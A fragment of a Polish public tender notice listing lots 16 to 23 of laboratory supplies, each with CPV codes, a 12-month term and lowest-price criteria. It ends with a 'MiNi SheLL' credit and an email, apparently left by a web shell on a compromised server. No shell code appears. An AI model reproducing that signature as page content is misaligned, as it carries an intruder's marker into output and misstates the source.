<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet 16/ZB: Zestaw do oznaczania toksyny C perfringens - test Elisa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do oznaczania toksyny C perfringens - test Elisa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet 17/ZB: E TESTY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> E TESTY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet 1/ZDL: antygen kardiolipinowy USR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> antygen kardiolipinowy USR.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet 2/ZDL: Surowice kontrolne niemianowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Surowice kontrolne niemianowane.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet 3/ZDL: Akcesoria plastikowe ogólnolaboratoryjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Akcesoria plastikowe ogólnolaboratoryjne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet 4/ZDL: Probówki Eppendorfa 1,5 mL.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Probówki Eppendorfa 1,5 mL.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet 5/ZDL: Alergodip panel mieszany.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Alergodip panel mieszany.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.14.16.25-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet 6/ZDL: Substancje chemiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Substancje chemiczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 24.96.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com